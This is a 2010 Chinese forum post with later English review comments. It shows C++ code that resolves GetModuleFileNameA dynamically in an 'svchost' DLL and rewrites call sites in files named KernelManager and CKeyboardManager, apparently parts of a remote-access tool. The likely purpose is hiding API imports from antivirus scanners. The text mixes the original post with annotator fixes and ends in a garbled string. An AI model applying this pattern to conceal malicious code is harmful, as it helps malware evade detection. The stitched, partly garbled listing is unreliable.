

ice_xke 发表于 2010-10-19 12:30

全局动态调用

全局动态调用笔记
svchost files 工程 -> 插入 -> 类 (Generic Class DTDY) -> DTDY.cpp DTDY.h
----------------------------------------
DTDY.h:
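// DTDY.h
//
// Declares a helper that obtains the address of kernel32!GetModuleFileNameA
// at run time through GetProcAddress, so the call sites use a function
// pointer instead of a normally linked import.
//
// Review note: the pasted listing ended with an `#endif` that had no matching
// opener, i.e. the header guard's `#ifndef`/`#define` lines were lost.
// DTDY_H_ below is a constructed guard name, not one taken from the original.
//
// Detection note (defender's view): with this pattern GetModuleFileNameA no
// longer appears in the module's import table, but the module still imports
// LoadLibraryA/GetProcAddress and carries the literal API name as a string,
// which is what static analysis of such DLLs typically keys on.
#ifndef DTDY_H_
#define DTDY_H_

#if _MSC_VER>1000
#pragma once
#endif //_MSC_VER>1000

#include<windows.h>

// Calling signature of GetModuleFileNameA (stdcall, HMODULE, LPSTR, DWORD).
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);

class DTDY
{
public:
    DTDY();
    virtual ~DTDY();
public:
    // Resolved address of GetModuleFileNameA; NULL until
    // FunInitiallization() has succeeded.
    static pGetModuleFileNameA MyGetModuleFileName;
    // Fills MyGetModuleFileName by looking the export up in kernel32.dll.
    // Returns TRUE on success, FALSE if the lookup failed. Must run before
    // MyGetModuleFileName is called. (Spelling kept as in the original
    // because callers use this name.)
    static BOOL FunInitiallization();
};

#endif // DTDY_H_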
----------------------------------------

DTDY.cpp:
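#include "DTDY.h"

// Storage for the resolved function pointer. It stays NULL until
// DTDY::FunInitiallization() has looked GetModuleFileNameA up, so callers
// must not use it before that call has returned TRUE.
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;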
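// Default constructor. The class holds only static members, so there is no
// per-instance state to set up. (The pasted listing had the name garbled to
// `DTDY:TDY()`.)
DTDY::DTDY()
{
}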
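// Destructor. Nothing is owned per instance; the resolved function pointer is
// static and is intentionally left as is.
DTDY::~DTDY()
{
}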
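// Resolves GetModuleFileNameA from kernel32.dll at run time and stores the
// address in MyGetModuleFileName.
//
// Returns TRUE when the export was found, FALSE if either the module could
// not be obtained or the export lookup failed.
//
// Fixes against the pasted listing: the condition `if(!MyGetModuleFileName=)`
// was a syntax error, and a NULL module handle was passed straight into
// GetProcAddress. NOTE(review): LoadLibrary on a module that is already
// mapped (kernel32 always is) adds a reference that is never released;
// GetModuleHandle would express the intent without that side effect.
BOOL DTDY::FunInitiallization()
{
    HMODULE hModule=LoadLibrary("kernel32.dll");
    if(!hModule) return FALSE;

    MyGetModuleFileName=
        reinterpret_cast<pGetModuleFileNameA>(GetProcAddress(hModule,"GetModuleFileNameA"));
    if(!MyGetModuleFileName) return FALSE;

    return TRUE;
}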
----------------------------------------
svchost.cpp:
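#include "DTDY.h"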
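// DLL entry point.
//
// On DLL_PROCESS_ATTACH it resolves the dynamically called API through
// DTDY::FunInitiallization(); if that fails the function returns FALSE and
// the loader abandons the load. Every other reason code returns TRUE.
//
// Fix against the pasted listing: the original fell off the end of the
// function for all reasons other than a failed attach, which is undefined
// behaviour for a non-void function (the loader read an unspecified BOOL).
// The brace structure was also garbled (one `}` too many).
//
// NOTE(review): FunInitiallization() calls LoadLibrary while the loader lock
// is held; the DllMain contract discourages that, and it only works here
// because kernel32.dll is already mapped into every process.
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        if(!DTDY::FunInitiallization()) return FALSE;
        break;
    default:
        break;
    }
    return TRUE;
}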
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName)); -> goto def
改写为
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
----------------------------------------
KernelManager.cpp:
#include "../DTDY.h"
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
改写为
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
"OYL2I;lSfM[w n ----------------------------------------

